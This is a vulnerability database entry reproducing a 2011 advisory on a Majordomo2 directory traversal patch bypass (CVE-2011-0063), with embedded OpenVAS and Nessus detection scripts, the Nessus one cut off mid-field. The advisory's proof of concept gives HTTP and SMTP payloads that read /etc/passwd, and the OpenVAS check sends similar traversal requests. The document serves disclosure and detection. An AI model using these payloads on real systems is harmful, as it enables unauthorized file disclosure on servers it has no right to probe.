Description
______________________________________________________________________
-------------------------- NSOADV-2011-003 ---------------------------
Majordomo2 'help' Command Directory Traversal (Patch Bypass)
______________________________________________________________________
______________________________________________________________________
111101111
11111 00110 00110001111
111111 01 01 1 11111011111111
11111 0 11 01 0 11 1 1 111011001
11111111101 1 11 0110111 1 1111101111
1001 0 1 10 11 0 10 11 1111111 1 111 111001
111111111 0 10 1111 0 11 11 111111111 1 1101 10
00111 0 0 11 00 0 1110 1 1011111111111 1111111 11 100
10111111 0 01 0 1 1 111110 11 1111111111111 11110000011
0111111110 0110 1110 1 0 11101111111111111011 11100 00
01111 0 10 1110 1 011111 1 111111111111111111111101 01
01110 0 10 111110 110 0 11101111111111111111101111101
111111 11 0 1111 0 1 1 1 1 111111111111111111111101 111
111110110 10 0111110 1 0 0 1111111111111111111111111 110
111 11111 1 1 111 1 10011 101111111111011111111 0 1100
111 10 110 101011110010 11111111111111111111111 11 0011100
11 10 001100 0001 111111111111111111 10 11 11110
11110 00100 00001 10 1 1111 101010001 11111111
11101 0 1011 10000 00100 11100 00001101 0
0110 111011011 0110 10001 101 11110
1011 1 10 101 000001 01 00
1010 1 11001 1 1 101 10
110101011 0 101 11110
110000011
111
______________________________________________________________________
______________________________________________________________________
Title: Majordomo2 'help' Command Directory Traversal
Severity: Medium
Advisory ID: NSOADV-2011-003
CVE: CVE-2011-0063
Found Date: 03.02.2011
Date Reported: 03.02.2011
Release Date: 19.02.2011
Author: Nikolas Sotiriu
Mail: nso-research at sotiriu.de
Website: http://sotiriu.de/
Twitter: http://twitter.com/nsoresearch
Advisory-URL: http://sotiriu.de/adv/NSOADV-2011-003.txt
Vendor/Project: http://www.mj2.org/
Affected Products: majordomo2 <= 20110203
Remote Exploitable: Yes
Local Exploitable: No
Patch Status: Vendor released a patch (See Solution)
Discovered by: Nikolas Sotiriu
Disclosure Policy: http://sotiriu.de/policy.html
Thanks to: Thierry Zoller: For the permission to use his
Policy
Background:
===========
Majordomo 2 is an upwardly-compatible rewrite of the popular majordomo
mailing list manager software by Jason Tibbitts and Michael Yount.
Description:
============
Majordomo2 <= 20110203 is affected by a Directory Traversal
vulnerability due to parameter 'extra' of the 'help' command in the
function '_list_file_get()' is not properly sanitized.
The original bug was made public on 03.02.2011 by Michael Brooks
of sitewat.ch:
https://sitewat.ch/en/Advisory/View/1
https://bugzilla.mozilla.org/show_bug.cgi?id=628064
I discovered, that the patch, which is in the CVS since version 20110125
don't protect against the Directory Traversal bug.
https://bug628064.bugzilla.mozilla.org/attachment.cgi?id=506481
The diff build in the regex '$file =~ s!/?\.\./?!!g;', which deletes
'../' from $file. Bypassing this regex is quiet simple by using './.../'
insted '../'.
Proof of Concept :
==================
HTTP:
http://<target>/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&
extra=./..././..././..././..././..././..././..././.../etc/passwd
SMTP:
help ./..././..././..././..././..././..././..././.../etc/passwd
Solution:
=========
Update to Majordomo2 >= 20110204
http://ftp.mj2.org/pub/mj2/snapshots/2011-02/majordomo-20110204.tar.gz
References:
===========
Sitewatch Advisory: https://sitewat.ch/en/Advisory/View/1
Original Bug: https://bugzilla.mozilla.org/show_bug.cgi?id=628064
Patch Bypass: https://bugzilla.mozilla.org/show_bug.cgi?id=631307
Disclosure Timeline (YYYY/MM/DD):
=================================
2011.02.03: Patch bypass vulnerability found
2011.02.03: Informed security [at] mozilla.org
2011.02.03: Mozilla opend Bug 631307 in bugzilla
2011.02.03: Jason Tibbitts comitted a fix (Sorry again)
2011.02.04: Snapshot available for download
2011.02.04: Discuss the public disclosure
2011.03.04: Got the Bug Bounty Money
2011.03.08: Release of Advisory
Related
{"id": "SECURITYVULNS:DOC:25895", "bulletinFamily": "software", "title": "NSOADV-2011-003: Majordomo2 'help' Command Directory Traversal (Patch Bypass)", "description": "______________________________________________________________________\r\n-------------------------- NSOADV-2011-003 ---------------------------\r\n\r\n Majordomo2 'help' Command Directory Traversal (Patch Bypass)\r\n______________________________________________________________________\r\n______________________________________________________________________\r\n\r\n 111101111\r\n 11111 00110 00110001111\r\n 111111 01 01 1 11111011111111\r\n 11111 0 11 01 0 11 1 1 111011001\r\n 11111111101 1 11 0110111 1 1111101111\r\n 1001 0 1 10 11 0 10 11 1111111 1 111 111001\r\n 111111111 0 10 1111 0 11 11 111111111 1 1101 10\r\n 00111 0 0 11 00 0 1110 1 1011111111111 1111111 11 100\r\n 10111111 0 01 0 1 1 111110 11 1111111111111 11110000011\r\n 0111111110 0110 1110 1 0 11101111111111111011 11100 00\r\n 01111 0 10 1110 1 011111 1 111111111111111111111101 01\r\n 01110 0 10 111110 110 0 11101111111111111111101111101\r\n 111111 11 0 1111 0 1 1 1 1 111111111111111111111101 111\r\n 111110110 10 0111110 1 0 0 1111111111111111111111111 110\r\n 111 11111 1 1 111 1 10011 101111111111011111111 0 1100\r\n 111 10 110 101011110010 11111111111111111111111 11 0011100\r\n 11 10 001100 0001 111111111111111111 10 11 11110\r\n 11110 00100 00001 10 1 1111 101010001 11111111\r\n 11101 0 1011 10000 00100 11100 00001101 0\r\n 0110 111011011 0110 10001 101 11110\r\n 1011 1 10 101 000001 01 00\r\n 1010 1 11001 1 1 101 10\r\n 110101011 0 101 11110\r\n 110000011\r\n 111\r\n______________________________________________________________________\r\n______________________________________________________________________\r\n\r\n Title: Majordomo2 'help' Command Directory Traversal\r\n Severity: Medium\r\n Advisory ID: NSOADV-2011-003\r\n CVE: CVE-2011-0063\r\n Found Date: 03.02.2011\r\n Date Reported: 03.02.2011\r\n Release Date: 19.02.2011\r\n Author: Nikolas Sotiriu\r\n Mail: nso-research at sotiriu.de\r\n Website: http://sotiriu.de/\r\n Twitter: http://twitter.com/nsoresearch\r\n Advisory-URL: http://sotiriu.de/adv/NSOADV-2011-003.txt\r\n Vendor/Project: http://www.mj2.org/\r\n Affected Products: majordomo2 <= 20110203\r\n Remote Exploitable: Yes\r\n Local Exploitable: No\r\n Patch Status: Vendor released a patch (See Solution)\r\n Discovered by: Nikolas Sotiriu\r\n Disclosure Policy: http://sotiriu.de/policy.html\r\n Thanks to: Thierry Zoller: For the permission to use his\r\n Policy\r\n\r\n\r\n\r\nBackground:\r\n===========\r\n\r\nMajordomo 2 is an upwardly-compatible rewrite of the popular majordomo\r\nmailing list manager software by Jason Tibbitts and Michael Yount.\r\n\r\n\r\n\r\nDescription:\r\n============\r\n\r\nMajordomo2 <= 20110203 is affected by a Directory Traversal\r\nvulnerability due to parameter 'extra' of the 'help' command in the\r\nfunction '_list_file_get()' is not properly sanitized.\r\n\r\nThe original bug was made public on 03.02.2011 by Michael Brooks\r\nof sitewat.ch:\r\n\r\nhttps://sitewat.ch/en/Advisory/View/1\r\nhttps://bugzilla.mozilla.org/show_bug.cgi?id=628064\r\n\r\nI discovered, that the patch, which is in the CVS since version 20110125\r\ndon't protect against the Directory Traversal bug.\r\n\r\nhttps://bug628064.bugzilla.mozilla.org/attachment.cgi?id=506481\r\n\r\nThe diff build in the regex '$file =~ s!/?\.\./?!!g;', which deletes\r\n'../' from $file. Bypassing this regex is quiet simple by using './.../'\r\ninsted '../'.\r\n\r\n\r\n\r\nProof of Concept :\r\n==================\r\n\r\nHTTP:\r\nhttp://<target>/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&\r\nextra=./..././..././..././..././..././..././..././.../etc/passwd\r\n\r\nSMTP:\r\nhelp ./..././..././..././..././..././..././..././.../etc/passwd\r\n\r\n\r\n\r\nSolution:\r\n=========\r\n\r\nUpdate to Majordomo2 >= 20110204\r\n\r\nhttp://ftp.mj2.org/pub/mj2/snapshots/2011-02/majordomo-20110204.tar.gz\r\n\r\n\r\n\r\nReferences:\r\n===========\r\n\r\nSitewatch Advisory: https://sitewat.ch/en/Advisory/View/1\r\nOriginal Bug: https://bugzilla.mozilla.org/show_bug.cgi?id=628064\r\nPatch Bypass: https://bugzilla.mozilla.org/show_bug.cgi?id=631307\r\n\r\n\r\n\r\nDisclosure Timeline (YYYY/MM/DD):\r\n=================================\r\n\r\n2011.02.03: Patch bypass vulnerability found\r\n2011.02.03: Informed security [at] mozilla.org\r\n2011.02.03: Mozilla opend Bug 631307 in bugzilla\r\n2011.02.03: Jason Tibbitts comitted a fix (Sorry again)\r\n2011.02.04: Snapshot available for download\r\n2011.02.04: Discuss the public disclosure\r\n2011.03.04: Got the Bug Bounty Money\r\n2011.03.08: Release of Advisory\r\n\r\n\r\n\r\n\r\n", "published": "2011-03-10T00:00:00", "modified": "2011-03-10T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25895", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2011-0063"], "type": "securityvulns", "lastseen": "2018-08-31T11:10:39", "edition": 1, "viewCount": 11, "enchantments": {"score": {"value": -0.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-0063"]}, {"type": "d2", "idList": ["D2SEC_MAJORDOMO2"]}, {"type": "dsquare", "idList": ["E-140"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/MAJORDOMO2_DIRECTORY_TRAVERSAL"]}, {"type": "nessus", "idList": ["MAJORDOMO2_DIR_TRAVERSAL.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310801838"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:99093"]}]}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2011-0063"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/MAJORDOMO2_DIRECTORY_TRAVERSAL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310801838"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:11397"]}]}, "exploitation": null, "vulnersScore": -0.5}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647589307, "score": 1659730939}}
{"packetstorm": [{"lastseen": "2016-12-05T22:12:07", "description": "", "cvss3": {}, "published": "2011-03-08T00:00:00", "type": "packetstorm", "title": "Majordomo2 Directory Traversal", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2011-0063"], "modified": "2011-03-08T00:00:00", "id": "PACKETSTORM:99093", "href": "https://packetstormsecurity.com/files/99093/Majordomo2-Directory-Traversal.html", "sourceData": "`______________________________________________________________________ \n-------------------------- NSOADV-2011-003 --------------------------- \n \nMajordomo2 'help' Command Directory Traversal (Patch Bypass) \n______________________________________________________________________ \n______________________________________________________________________ \n \n111101111 \n11111 00110 00110001111 \n111111 01 01 1 11111011111111 \n11111 0 11 01 0 11 1 1 111011001 \n11111111101 1 11 0110111 1 1111101111 \n1001 0 1 10 11 0 10 11 1111111 1 111 111001 \n111111111 0 10 1111 0 11 11 111111111 1 1101 10 \n00111 0 0 11 00 0 1110 1 1011111111111 1111111 11 100 \n10111111 0 01 0 1 1 111110 11 1111111111111 11110000011 \n0111111110 0110 1110 1 0 11101111111111111011 11100 00 \n01111 0 10 1110 1 011111 1 111111111111111111111101 01 \n01110 0 10 111110 110 0 11101111111111111111101111101 \n111111 11 0 1111 0 1 1 1 1 111111111111111111111101 111 \n111110110 10 0111110 1 0 0 1111111111111111111111111 110 \n111 11111 1 1 111 1 10011 101111111111011111111 0 1100 \n111 10 110 101011110010 11111111111111111111111 11 0011100 \n11 10 001100 0001 111111111111111111 10 11 11110 \n11110 00100 00001 10 1 1111 101010001 11111111 \n11101 0 1011 10000 00100 11100 00001101 0 \n0110 111011011 0110 10001 101 11110 \n1011 1 10 101 000001 01 00 \n1010 1 11001 1 1 101 10 \n110101011 0 101 11110 \n110000011 \n111 \n______________________________________________________________________ \n______________________________________________________________________ \n \nTitle: Majordomo2 'help' Command Directory Traversal \nSeverity: Medium \nAdvisory ID: NSOADV-2011-003 \nCVE: CVE-2011-0063 \nFound Date: 03.02.2011 \nDate Reported: 03.02.2011 \nRelease Date: 19.02.2011 \nAuthor: Nikolas Sotiriu \nMail: nso-research at sotiriu.de \nWebsite: http://sotiriu.de/ \nTwitter: http://twitter.com/nsoresearch \nAdvisory-URL: http://sotiriu.de/adv/NSOADV-2011-003.txt \nVendor/Project: http://www.mj2.org/ \nAffected Products: majordomo2 <= 20110203 \nRemote Exploitable: Yes \nLocal Exploitable: No \nPatch Status: Vendor released a patch (See Solution) \nDiscovered by: Nikolas Sotiriu \nDisclosure Policy: http://sotiriu.de/policy.html \nThanks to: Thierry Zoller: For the permission to use his \nPolicy \n \n \n \nBackground: \n=========== \n \nMajordomo 2 is an upwardly-compatible rewrite of the popular majordomo \nmailing list manager software by Jason Tibbitts and Michael Yount. \n \n \n \nDescription: \n============ \n \nMajordomo2 <= 20110203 is affected by a Directory Traversal \nvulnerability due to parameter 'extra' of the 'help' command in the \nfunction '_list_file_get()' is not properly sanitized. \n \nThe original bug was made public on 03.02.2011 by Michael Brooks \nof sitewat.ch: \n \nhttps://sitewat.ch/en/Advisory/View/1 \nhttps://bugzilla.mozilla.org/show_bug.cgi?id=628064 \n \nI discovered, that the patch, which is in the CVS since version 20110125 \ndon't protect against the Directory Traversal bug. \n \nhttps://bug628064.bugzilla.mozilla.org/attachment.cgi?id=506481 \n \nThe diff build in the regex '$file =~ s!/?\\.\\./?!!g;', which deletes \n'../' from $file. Bypassing this regex is quiet simple by using './.../' \ninsted '../'. \n \n \n \nProof of Concept : \n================== \n \nHTTP: \nhttp://<target>/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help& \nextra=./..././..././..././..././..././..././..././.../etc/passwd \n \nSMTP: \nhelp ./..././..././..././..././..././..././..././.../etc/passwd \n \n \n \nSolution: \n========= \n \nUpdate to Majordomo2 >= 20110204 \n \nhttp://ftp.mj2.org/pub/mj2/snapshots/2011-02/majordomo-20110204.tar.gz \n \n \n \nReferences: \n=========== \n \nSitewatch Advisory: https://sitewat.ch/en/Advisory/View/1 \nOriginal Bug: https://bugzilla.mozilla.org/show_bug.cgi?id=628064 \nPatch Bypass: https://bugzilla.mozilla.org/show_bug.cgi?id=631307 \n \n \n \nDisclosure Timeline (YYYY/MM/DD): \n================================= \n \n2011.02.03: Patch bypass vulnerability found \n2011.02.03: Informed security [at] mozilla.org \n2011.02.03: Mozilla opend Bug 631307 in bugzilla \n2011.02.03: Jason Tibbitts comitted a fix (Sorry again) \n2011.02.04: Snapshot available for download \n2011.02.04: Discuss the public disclosure \n2011.03.04: Got the Bug Bounty Money \n2011.03.08: Release of Advisory \n \n \n \n \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/99093/NSOADV-2011-003.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "d2": [{"lastseen": "2021-07-28T14:32:23", "description": "**Name**| d2sec_majordomo2 \n---|--- \n**CVE**| CVE-2011-0063 \n**Exploit Pack**| [D2ExploitPack](<http://http://www.d2sec.com/products.htm>) \n**Description**| d2sec_majordomo2 \n**Notes**| \n", "edition": 3, "cvss3": {}, "published": "2011-03-15T17:55:00", "title": "DSquare Exploit Pack: D2SEC_MAJORDOMO2", "type": "d2", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0063"], "modified": "2011-03-15T17:55:00", "id": "D2SEC_MAJORDOMO2", "href": "http://exploitlist.immunityinc.com/home/exploitpack/D2ExploitPack/d2sec_majordomo2", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "openvas": [{"lastseen": "2020-05-08T19:10:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0063", "CVE-2011-0049"], "description": "The host is running Majordomo2 and is prone to directory traversal\n vulnerability.", "modified": "2020-05-06T00:00:00", "published": "2011-02-07T00:00:00", "id": "OPENVAS:1361412562310801838", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801838", "type": "openvas", "title": "Majordomo2 Directory Traversal Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Majordomo2 Directory Traversal Vulnerability\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801838\");\n script_version(\"2020-05-06T07:10:15+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-06 07:10:15 +0000 (Wed, 06 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-02-07 15:21:16 +0100 (Mon, 07 Feb 2011)\");\n script_bugtraq_id(46127);\n script_cve_id(\"CVE-2011-0049\", \"CVE-2011-0063\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"Majordomo2 Directory Traversal Vulnerability\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"no404.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\", \"os_detection.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_xref(name:\"URL\", value:\"https://sitewat.ch/en/Advisory/View/1\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/16103/\");\n script_xref(name:\"URL\", value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=628064\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to obtain sensitive information\n that could aid in further attacks.\");\n\n script_tag(name:\"affected\", value:\"Majordomo2 Build 20110203 and prior.\");\n\n script_tag(name:\"insight\", value:\"The flaw is caused by improper validation of user-supplied input via the\n 'help' parameter in 'mj_wwwusr', which allows attacker to read arbitrary\n files via directory traversal attacks.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Majordomo2 Build 20110204 or later.\");\n\n script_tag(name:\"summary\", value:\"The host is running Majordomo2 and is prone to directory traversal\n vulnerability.\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = http_get_port( default:80 );\n\nfiles = traversal_files();\n\nforeach dir( make_list_unique( \"/\", http_cgi_dirs( port:port ) ) ) {\n\n if( dir == \"/\" ) dir = \"\";\n\n res = http_get_cache( item:dir + \"/mj_wwwusr\", port:port );\n\n if( '>Majordomo' >< res ) {\n\n foreach file( keys( files ) ) {\n\n url = dir + \"/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../\" +\n \"../../../../../../\" + files[file];\n\n if( http_vuln_check( port:port, url:url, pattern:file ) ) {\n report = http_report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n }\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "dsquare": [{"lastseen": "2021-07-28T14:33:45", "description": "File disclosure vulnerability in Majordomo 2 help command\n\nVulnerability Type: File Disclosure", "cvss3": {}, "published": "2012-04-27T00:00:00", "type": "dsquare", "title": "Majordomo 2 File Disclosure", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0049", "CVE-2011-0063"], "modified": "2013-04-02T00:00:00", "id": "E-140", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "cve": [{"lastseen": "2022-03-23T11:29:21", "description": "The _list_file_get function in lib/Majordomo.pm in Majordomo 2 20110203 and earlier allows remote attackers to conduct directory traversal attacks and read arbitrary files via a ./.../ sequence in the \"extra\" parameter to the help command, which causes the regular expression to produce .. (dot dot) sequences. NOTE: this vulnerability is due to an incomplete fix for CVE-2011-0049.", "cvss3": {}, "published": "2011-03-15T17:55:00", "type": "cve", "title": "CVE-2011-0063", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0049", "CVE-2011-0063"], "modified": "2018-10-10T20:09:00", "cpe": ["cpe:/a:mj2:majordomo_2:20110113", "cpe:/a:mj2:majordomo_2:20110124", "cpe:/a:mj2:majordomo_2:20110109", "cpe:/a:mj2:majordomo_2:20110107", "cpe:/a:mj2:majordomo_2:20110125", "cpe:/a:mj2:majordomo_2:20110118", "cpe:/a:mj2:majordomo_2:20110123", "cpe:/a:mj2:majordomo_2:20110106", "cpe:/a:mj2:majordomo_2:20110127", "cpe:/a:mj2:majordomo_2:20110114", "cpe:/a:mj2:majordomo_2:20110115", "cpe:/a:mj2:majordomo_2:20110131", "cpe:/a:mj2:majordomo_2:20110112", "cpe:/a:mj2:majordomo_2:20110121", "cpe:/a:mj2:majordomo_2:20110104", "cpe:/a:mj2:majordomo_2:20110102", "cpe:/a:mj2:majordomo_2:20110129", "cpe:/a:mj2:majordomo_2:20110120", "cpe:/a:mj2:majordomo_2:20110201", "cpe:/a:mj2:majordomo_2:20110202", "cpe:/a:mj2:majordomo_2:20110126", "cpe:/a:mj2:majordomo_2:20110105", "cpe:/a:mj2:majordomo_2:20110122", "cpe:/a:mj2:majordomo_2:20110111", "cpe:/a:mj2:majordomo_2:20110101", "cpe:/a:mj2:majordomo_2:20110130", "cpe:/a:mj2:majordomo_2:20110103", "cpe:/a:mj2:majordomo_2:20110110", "cpe:/a:mj2:majordomo_2:20110203", "cpe:/a:mj2:majordomo_2:20110116", "cpe:/a:mj2:majordomo_2:20110119", "cpe:/a:mj2:majordomo_2:20110117", "cpe:/a:mj2:majordomo_2:20110108", "cpe:/a:mj2:majordomo_2:20110128"], "id": "CVE-2011-0063", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0063", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:mj2:majordomo_2:20110111:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110102:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110118:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110113:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110125:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110130:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110131:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110201:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110203:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110109:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110101:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110119:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110103:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110112:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110121:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110110:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110126:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110123:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110108:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110128:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110127:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110120:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110104:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110117:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110116:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110124:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110107:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110106:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110129:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110122:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110115:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110114:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110105:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110202:*:*:*:*:*:*:*"]}], "nessus": [{"lastseen": "2021-08-19T13:01:44", "description": "The version of Majordomo 2 on the remote host fails to sanitize input to the 'extra' parameter of the 'mj_wwwusr' script before using it to return the contents of a file.\n\nAn attacker can leverage this issue using a directory traversal sequence to view arbitrary files on the affected host within the context of the web server. Information harvested may aid in launching further attacks.\n\nNote that this issue is also reportedly exploitable through Majordomo's email interface, although Nessus has not checked for that.", "cvss3": {"score": null, "vector": null}, "published": "2011-02-16T00:00:00", "type": "nessus", "title": "Majordomo 2 _list_file_get() Function Traversal Arbitrary File Access", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0049", "CVE-2011-0063"], "modified": "2021-01-19T00:00:00", "cpe": [], "id": "MAJORDOMO2_DIR_TRAVERSAL.NASL", "href": "https://www.tenable.com/plugins/nessus/52000", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(52000);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2011-0049\", \"CVE-2011-0063\");\n script_bugtraq_id(46127);\n script_xref(name:\"CERT\", value:\"363726\");\n script_xref(name:\"EDB-ID\", value:\"16103\");\n script_xref(name:\"Secunia\", value:\"43125\");\n script_xref(name:\"Secunia\", value:\"43631\");\n\n script_name(english:\"Majordomo 2 _list_file_get() Function Traversal Arbitrary File Access\");\n script_summary(english:\"Tries to grab /etc/passwd.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote web server hosts a web application that contains a\ndirectory traversal vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of Majordomo 2 on the remote host fails to sanitize input\nto the 'extra' parameter of the 'mj_wwwusr' script before using it to\nreturn the contents of a file.\n\nAn attacker can leverage this issue using a directory traversal\nsequence to view arbitrary files on the affected host within the\ncontext of the web server. Information harvested may aid in launching\nfurther attacks.\n\nNote that this issue is also reportedly exploitable through\nMajordomo's email interface, although Nessus has not checked for\nthat.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Majordomo 2 build 20110204 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Majordomo 2 File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", 